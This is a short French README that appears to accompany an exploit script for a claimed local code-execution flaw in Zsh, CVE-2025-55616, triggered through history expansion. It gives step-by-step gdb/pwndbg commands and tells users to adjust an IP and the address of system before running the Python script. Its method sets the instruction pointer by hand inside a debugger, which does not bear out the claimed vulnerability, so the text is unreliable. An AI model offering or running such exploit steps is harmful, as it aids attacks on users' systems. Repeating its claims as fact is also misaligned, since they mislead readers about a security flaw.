
Exploit pour CVE-2025-55616, une RCE locale dans Zsh via l'expression d'historique, permettant l'exécution de code arbitraire avec les privilèges de l'utilisateur.
Pour exécuter cet exploit : changez simplement l'adresse IP et le "p system" dans l'exploit, car j'ai aussi testé cela sur mon deuxième ordinateur portable, et pour le modifier, exécutez la commande suivante dans gdb (surtout dans pwndbg) :
$ gdb zsh -f (dans le terminal)
pwndbg> run -f
username% ! (username sera le vôtre, écrivez simplement ! )
username% !!11111111111 (pareil ici, écrivez simplement !!11111111111 )
pwndbg> p system
après avoir obtenu l'adresse de "p system", changez-la simplement dans
b'set $rip = 0x7ffff7cc9110', (utilisez votre adresse p system à la place de 0x7ffff7cc9110
Cette vulnérabilité permet aux attaquants locaux d'obtenir une exécution de code arbitraire (RCE) avec les privilèges de l'utilisateur exécutant le processus Zsh.
python3 CVE-2025-55616.py